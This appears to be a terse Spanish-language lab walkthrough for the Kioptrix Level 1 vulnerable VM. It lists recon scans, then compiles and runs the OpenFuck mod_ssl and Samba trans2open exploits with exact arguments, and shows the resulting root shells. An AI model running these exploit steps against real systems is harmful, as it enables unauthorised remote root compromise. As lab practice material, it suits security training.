Kioptrix Level 1

netdiscover
  La encontramos en 192.168.111.129

nmap -sV -O -Pn 192.168.111.129
  PORT      STATE SERVICE     VERSION
  22/tcp    open  ssh         OpenSSH 2.9p2 (protocol 1.99)
  80/tcp    open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
  111/tcp   open  rpcbind     2 (RPC #100000)
  139/tcp   open  netbios-ssn Samba smbd (workgroup: MYGROUP)
  443/tcp   open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
  32768/tcp open  status      1 (RPC #100024)
  
rpcinfo -p 192.168.111.129
  program vers proto   port  service
    100000    2   tcp    111  portmapper
    100000    2   udp    111  portmapper
    100024    1   udp  32768  status
    100024    1   tcp  32768  status
    
gobuster -w /usr/share/wordlists/dirb/big.txt -u 192.168.111.129 -t 50 dir
  /.htpasswd (Status: 403)
  /.htaccess (Status: 403)
  /cgi-bin/ (Status: 403)
  /manual (Status: 301)
  /mrtg (Status: 301)
  /usage (Status: 301)
  /~root (Status: 403)
  /~operator (Status: 403)

enum4linux -a 192.168.111.129
  [+] Got domain/workgroup name: MYGROUP
  KIOPTRIX        <00> -         B <ACTIVE>  Workstation Service
  KIOPTRIX        <03> -         B <ACTIVE>  Messenger Service
  KIOPTRIX        <20> -         B <ACTIVE>  File Server Service
  ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser
  MYGROUP         <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
  MYGROUP         <1d> -         B <ACTIVE>  Master Browser
  MYGROUP         <1e> - <GROUP> B <ACTIVE>  Browser Service Elections

nmap --script smb-vuln* -p 139 192.168.111.129
  Host script results:
  | smb-vuln-cve2009-3103: 
  |   VULNERABLE:
  |   SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)
  |     State: VULNERABLE
  |     IDs:  CVE:CVE-2009-3103
  |           Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2,
  |           Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a
  |           denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE
  |           PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location,
  |           aka "SMBv2 Negotiation Vulnerability."
  |           
  |     Disclosure date: 2009-09-08
  |     References:
  |       http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
  |_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
  |_smb-vuln-ms10-054: false
  |_smb-vuln-ms10-061: Could not negotiate a connection:SMB: ERROR: Server returned less data than it was supposed to (one or more fields are missing); aborting [14]

searchsploit openfuck
  Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c' Remote Buffer Overflow                                                                                                                              | exploits/unix/remote/21671.c
  Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (1)                                                                                                                        | exploits/unix/remote/764.c
  Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2)                                                                                                                        | exploits/unix/remote/47080.c

apt-get install libssl-dev
gcc -o OpenFuck 47080.c -lcrypto
./OpenFuck 0x6b 192.168.111.129 443 -c 40
Y ya somos root

smbclient --list 192.168.111.129
  En mi caso no arrojaba nada, pero en writeups decía que es Samba 2.2 así que parto de esa premisa
searchsploit samba 2.2
  Samba 2.0.x/2.2 - Arbitrary File Creation                                                                                                                                                         | exploits/unix/remote/20968.txt
  Samba 2.2.0 < 2.2.8 (OSX) - trans2open Overflow (Metasploit)                                                                                                                                      | exploits/osx/remote/9924.rb
  Samba 2.2.2 < 2.2.6 - 'nttrans' Remote Buffer Overflow (Metasploit) (1)                                                                                                                           | exploits/linux/remote/16321.rb
  Samba 2.2.8 (BSD x86) - 'trans2open' Remote Overflow (Metasploit)                                                                                                                                 | exploits/bsd_x86/remote/16880.rb
  Samba 2.2.8 (Linux Kernel 2.6 / Debian / Mandrake) - Share Privilege Escalation                                                                                                                   | exploits/linux/local/23674.txt
  Samba 2.2.8 (Linux x86) - 'trans2open' Remote Overflow (Metasploit)                                                                                                                               | exploits/linux_x86/remote/16861.rb
  Samba 2.2.8 (OSX/PPC) - 'trans2open' Remote Overflow (Metasploit)                                                                                                                                 | exploits/osx_ppc/remote/16876.rb
  Samba 2.2.8 (Solaris SPARC) - 'trans2open' Remote Overflow (Metasploit)                                                                                                                           | exploits/solaris_sparc/remote/16330.rb
  Samba 2.2.8 - Brute Force Method Remote Command Execution                                                                                                                                         | exploits/linux/remote/55.c
  Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (1)                                                                                                                                        | exploits/unix/remote/22468.c
  Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (2)                                                                                                                                        | exploits/unix/remote/22469.c
  Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (3)                                                                                                                                        | exploits/unix/remote/22470.c
  Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (4)                                                                                                                                        | exploits/unix/remote/22471.txt
  Samba 2.2.x - 'nttrans' Remote Overflow (Metasploit)                                                                                                                                              | exploits/linux/remote/9936.rb
  Samba 2.2.x - CIFS/9000 Server A.01.x Packet Assembling Buffer Overflow                                                                                                                           | exploits/unix/remote/22356.c
  Samba 2.2.x - Remote Buffer Overflow                                                                                                                                                              | exploits/linux/remote/7.pl
  Samba < 2.2.8 (Linux/BSD) - Remote Code Execution                                                                                                                                                 | exploits/multiple/remote/10.c

cp /usr/share/exploitdb/exploits/multiple/remote/10.c ./
gcc -o sambaEx 10.c
./sambaEx -S 192.168.111
  samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
  --------------------------------------------------------------
  + Scan mode.
  + [192.168.111.1] Windows
  + [192.168.111.129] Samba

./sambaEx -b 0 -v 192.168.111.129
  samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
  --------------------------------------------------------------
  + Verbose mode.
  + Bruteforce mode. (Linux)
  + Host is running samba.
  + Using ret: [0xbffffed4]
  + Using ret: [0xbffffda8]
  + Using ret: [0xbffffc7c]
  + Worked!
  --------------------------------------------------------------
  *** JE MOET JE MUIL HOUWE
  Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown
  uid=0(root) gid=0(root) groups=99(nobody)
 
 Y ya somos root

